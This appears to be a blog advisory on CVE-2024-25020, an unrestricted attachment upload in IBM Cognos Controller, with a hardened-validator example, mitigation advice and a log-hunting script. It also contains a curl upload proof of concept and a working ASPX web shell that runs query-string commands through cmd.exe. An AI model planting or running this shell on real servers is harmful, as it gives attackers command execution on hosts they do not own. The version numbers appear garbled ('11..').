CVE-2024-25020 - Remote Code Execution in IBM Cognos Controller via Malicious File Upload
In 2024, IBM disclosed a vulnerability in IBM Cognos Controller versions 11.. and 11..1, tracked as CVE-2024-25020. The application accepts file attachments without restricting their type, which gives an authenticated user a way to plant executable content inside an enterprise financial system. In this post we break down how the flaw works, show what exploitation looks like with code snippets, discuss the potential impact, and link to the primary references.
Vulnerability Overview
IBM Cognos Controller is a widely used financial reporting and consolidation product. The flaw is a missing server-side validation step rather than an access-control bug: on the Journal entry page of versions 11.. and 11..1, attachments are accepted without any check of the file extension or content, so the server stores whatever it is handed.
An authenticated user can therefore upload executables, scripts or web-shell source (.exe, .bat, .aspx and so on) as journal attachments. At minimum the file becomes a trusted-looking download that other users of the system may open; if the storage location is also served by the web server and handled as script, it can execute on the server itself.
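The following Python is an added example written for this post; it is not IBM code and not part of the advisory. It puts the behaviour described above (store whatever arrives, under the name the client chose) beside a hardened acceptor that enforces an extension allowlist, rejects double extensions, checks the file's leading bytes against the claimed type, and stores the file under a server-generated name. The allowlist, size limit and sample files are constructed for the demo.

```python
"""Added example (not IBM's code, not from the original post): the unchecked
upload behaviour beside a hardened acceptor for journal attachments.
Allowlist, size limit and sample payloads below are constructed for the demo."""
import os
import re
import secrets

# Claimed extension -> allowed leading bytes (magic). Constructed allowlist;
# a real product would tune this to the document types it actually needs.
ALLOWED_TYPES = {
    ".pdf": [b"%PDF-"],
    ".png": [b"\x89PNG\r\n\x1a\n"],
    ".jpg": [b"\xff\xd8\xff"],
    ".jpeg": [b"\xff\xd8\xff"],
    # .xlsx is a ZIP container; this magic also matches other ZIP-based formats
    ".xlsx": [b"PK\x03\x04"],
    ".csv": None,  # plain text: no fixed magic, so a text-only check is applied
}
MAX_BYTES = 10 * 1024 * 1024


def vulnerable_accept(filename: str, data: bytes) -> str:
    """Behaviour the post describes: any name, any content, stored as given."""
    return filename


class UploadRejected(ValueError):
    pass


def _looks_like_text(data: bytes) -> bool:
    # Reject NUL bytes and non-UTF-8 payloads for types treated as plain text.
    if b"\x00" in data:
        return False
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return True


def hardened_accept(filename: str, data: bytes) -> str:
    """Return the name the file will be stored under, or raise UploadRejected.

    Order of checks: size; exactly one allowlisted extension (so names like
    "shell.aspx.pdf" are refused); content bytes consistent with that extension;
    finally a random server-side name so the client never controls the path."""
    if len(data) == 0 or len(data) > MAX_BYTES:
        raise UploadRejected("empty or oversized upload")

    base = os.path.basename(filename.replace("\\", "/"))  # strips any directory part
    root, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")
    # A dot left in the stem means a double extension; treat it as hostile.
    if "." in root or not re.fullmatch(r"[A-Za-z0-9 _-]{1,100}", root):
        raise UploadRejected("filename characters not allowed")

    magics = ALLOWED_TYPES[ext]
    if magics is None:
        if not _looks_like_text(data):
            raise UploadRejected("binary content in a text-only type")
    elif not any(data.startswith(m) for m in magics):
        raise UploadRejected(f"content does not match {ext}")

    # Store under a random name with the verified extension, never the original.
    return f"{secrets.token_hex(16)}{ext}"


def check(filename: str, data: bytes) -> str:
    """One-line verdict for a candidate upload (used by the demo below)."""
    try:
        return "stored as " + hardened_accept(filename, data)
    except UploadRejected as e:
        return "rejected: " + str(e)


if __name__ == "__main__":
    samples = {  # constructed inputs
        "payload.exe": b"MZ\x90\x00" + b"\x00" * 60,   # PE header
        "shell.aspx": b'<%@ Page Language="C#" %>',
        "notes.pdf": b"MZ\x90\x00",                     # executable renamed to .pdf
        "shell.aspx.pdf": b"%PDF-1.7\n",                # double extension
        "real.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",
        "journal.csv": b"account,amount\n1000,42.00\n",
    }
    for name, blob in samples.items():
        print(f"{name:16s} vulnerable -> {vulnerable_accept(name, blob)}")
        print(f"{name:16s} hardened   -> {check(name, blob)}")
```

Note that the hardened path still trusts nothing about the stored file: the random name is what gets persisted, the original filename is only shown back to users, and the store itself should live outside any directory the web server executes from.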
Attack Flow
Access the Journal Entry Page
The attacker logs into IBM Cognos Controller with a valid account and opens the page used for journal transactions.
Upload Malicious File
Because there is no restriction on file types, the attacker attaches a file containing malicious code (for example a reverse shell written as a script, or a disguised executable).
Trigger the Payload
If the attachment is opened by an administrator or another user (or, in some deployments, processed by a backend service), the payload executes, potentially giving the attacker remote access or allowing data theft.
PoC: Uploading a Malicious File
Let's see what this looks like with a simple curl request, assuming you already hold an authenticated session cookie. The cookie name and the upload path are placeholders for this write-up.
curl -k -X POST \
  -F "file=@/tmp/malicious.exe" \
  -F "description=Test Malicious Upload" \
  -b "JSESSIONID=YOUR_SESSION_COOKIE" \
  "https://cognos-controller.example.com/cc/journal/attachments/upload"
Note: Replace the endpoint with the real upload handler, found by watching the Journal entry page through an intercepting proxy (/cc/journal/attachments/upload is a demo path). The -k flag disables TLS certificate verification and belongs only in a lab. The vulnerable application saves the file without checking its type or extension.
If the server also serves stored attachments through IIS with the ASPX handler mapped (an assumption for this scenario, not something the advisory states), a minimal web shell such as the following could be uploaded. The original one-liner only started the process; this version also returns the command's output to the browser, which is what makes the ?cmd= call below useful.
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Diagnostics" %>
<%
// Minimal web shell: runs the value of ?cmd= through cmd.exe and echoes stdout.
// A bare Process.Start() would run the command but return nothing to the browser.
if (!String.IsNullOrEmpty(Request["cmd"]))
{
    ProcessStartInfo psi = new ProcessStartInfo("cmd.exe", "/c " + Request["cmd"]);
    psi.UseShellExecute = false;
    psi.RedirectStandardOutput = true;
    Process p = Process.Start(psi);
    Response.Write("<pre>" + Server.HtmlEncode(p.StandardOutput.ReadToEnd()) + "</pre>");
    p.WaitForExit();
}
%>
The attacker uploads this as shell.aspx and then requests it with a command in the query string, for example:
https://cognos-controller.example.com/attachments/shell.aspx?cmd=whoami
Whether this step works depends on the attachment store sitting under the web root and being executed rather than served as a static download. If attachments are only ever served as downloads, the uploaded file is still a malware-delivery vector for anyone who opens it, which is the impact the advisory describes.
> Warning: This is a dangerous attack with high potential impact.
Real-World Impact
- Remote Code Execution: if the stored file can be executed by the server, the attacker gains control of the host running Cognos Controller.
- Malware Delivery: uploaded executables sit inside a trusted financial system and can be passed to internal users, spreading ransomware or spyware.
Mitigation and Recommendations
IBM has released fixes and a security bulletin for this issue. Users of IBM Cognos Controller 11.. and 11..1 should upgrade to a fixed release as soon as possible. Until then, and as defence in depth afterwards: restrict the upload handler to an allowlist of document types at a reverse proxy or WAF, keep the attachment store outside the web root (or serve it only as downloads with Content-Disposition: attachment and no script handlers), and audit attachments uploaded before the patch for executables and scripts.
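Before declaring an instance clean, it is worth checking whether the upload path was abused earlier. The following Python is an added example for this post, not IBM's code and not from the advisory: it hunts web-server access logs for the two signals the attack flow above would leave, a stored attachment being requested with a script or executable extension, and an upload followed shortly by a request to an attachment path carrying a query string (the shape of a web-shell invocation). The log lines, IPs and user names are constructed, and the /cc/journal/attachments/upload and /attachments/ paths are the same placeholders used in the PoC.

```python
"""Added example (not IBM's code, not from the original post): hunt access logs
for the upload-then-execute pattern. Log lines, users, IPs and the two URL paths
are constructed placeholders matching the PoC in this post."""
import re
from datetime import datetime

# Combined log format as written by Apache/nginx style front ends (constructed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
UPLOAD_PATH = "/cc/journal/attachments/upload"   # assumed upload handler
SERVE_PREFIX = "/attachments/"                    # assumed attachment URL prefix
SCRIPT_EXT = {".aspx", ".ashx", ".asmx", ".asp", ".jsp", ".jspx",
              ".php", ".exe", ".bat", ".cmd", ".ps1"}

# Constructed sample: one legitimate user, one web-shell user, one victim download.
SAMPLE_LOG = """\
10.0.0.5 - alice [03/Dec/2024:10:01:07 +0000] "POST /cc/journal/attachments/upload HTTP/1.1" 200 512
10.0.0.5 - alice [03/Dec/2024:10:01:09 +0000] "GET /attachments/invoice-q3.pdf HTTP/1.1" 200 88012
10.0.0.9 - mallory [03/Dec/2024:10:14:51 +0000] "POST /cc/journal/attachments/upload HTTP/1.1" 200 512
10.0.0.9 - mallory [03/Dec/2024:10:15:02 +0000] "GET /attachments/shell.aspx?cmd=whoami HTTP/1.1" 200 64
10.0.0.9 - mallory [03/Dec/2024:10:15:40 +0000] "GET /attachments/shell.aspx?cmd=net+user HTTP/1.1" 200 1290
10.0.0.7 - bob [03/Dec/2024:11:02:13 +0000] "GET /attachments/payload.exe HTTP/1.1" 200 302080
"""


def parse(log_text):
    """Yield one dict per parseable line; unparseable lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
        rec["status"] = int(rec["status"])
        yield rec


def _ext(path):
    # Extension of the last path segment, ignoring the query string.
    base = path.split("?", 1)[0].rsplit("/", 1)[-1]
    return ("." + base.rsplit(".", 1)[-1].lower()) if "." in base else ""


def hunt(log_text, window_seconds=600):
    """Return (kind, user, ip, path) findings for:
    executable_attachment_served: a stored attachment fetched with a script/exe extension
    upload_then_invoke: an upload by (ip, user) followed within window_seconds by a
                        request to an attachment path that carries a query string"""
    findings = []
    last_upload = {}  # (ip, user) -> time of most recent successful upload
    for r in parse(log_text):
        key = (r["ip"], r["user"])
        if r["method"] == "POST" and r["path"].split("?")[0] == UPLOAD_PATH and r["status"] < 400:
            last_upload[key] = r["ts"]
            continue
        if not r["path"].startswith(SERVE_PREFIX):
            continue
        if _ext(r["path"]) in SCRIPT_EXT:
            findings.append(("executable_attachment_served", r["user"], r["ip"], r["path"]))
        up = last_upload.get(key)
        if up is not None and "?" in r["path"] and (r["ts"] - up).total_seconds() <= window_seconds:
            findings.append(("upload_then_invoke", r["user"], r["ip"], r["path"]))
    return findings


if __name__ == "__main__":
    for kind, user, ip, path in hunt(SAMPLE_LOG):
        print(f"{kind:30s} {user:8s} {ip:10s} {path}")
```

On the sample, alice's PDF produces nothing, both of mallory's shell.aspx requests trip both signals, and bob fetching payload.exe shows the delivery-to-victim case even without any execution on the server. Point the script at the real front-end logs and adjust UPLOAD_PATH and SERVE_PREFIX to the paths observed in your proxy.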
References & Further Reading
- IBM Security Bulletin: Vulnerability in IBM Cognos Controller affects 11.. and 11..1 (CVE-2024-25020)
- NVD Entry for CVE-2024-25020
- What is Remote Code Execution? (OWASP)
- File Upload Vulnerabilities Explained – PortSwigger
Conclusion
CVE-2024-25020 is a reminder that file upload handlers need server-side validation of both name and content. Accepting any file type, especially in a high-trust financial system like IBM Cognos Controller, turns the application into a distribution point for malware and, depending on how attachments are stored and served, a foothold on the server. Organizations should patch now, harden their upload logic, and keep auditing their applications for the same class of exposure.
Timeline
Published on: 12/03/2024 18:15:12 UTC
Last modified on: 12/11/2024 03:28:15 UTC